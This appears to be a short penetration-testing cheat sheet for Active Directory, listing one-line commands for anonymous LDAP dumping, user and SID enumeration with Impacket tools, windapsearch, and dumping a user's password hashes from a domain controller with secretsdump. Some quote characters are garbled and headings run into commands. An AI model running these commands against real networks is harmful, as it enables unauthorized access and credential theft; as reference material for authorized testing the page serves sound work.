Active Directory (AD)
Anonymous Credential LDAP Dumping
ldapsearch -LLL -x -H ldap://<domain fqdn> -b ββ -s base β(objectclass=*)βImpacket GetADUsers.py (Must have valid credentials)
GetADUsers.py -all <domain\User> -dc-ip <DC_IP>Impacket lookupsid.py
/usr/share/doc/python3-impacket/examples/lookupsid.py username:password@172.21.0.0Impacket Secretdump
python3 secretdump.py 'breakme.local/Administrator@172.21.0.0' -just-dc-user anakinWindapsearch
python3 windapsearch.py -d host.domain -u domain\\ldapbind -p PASSWORD -UReferences:
Last updated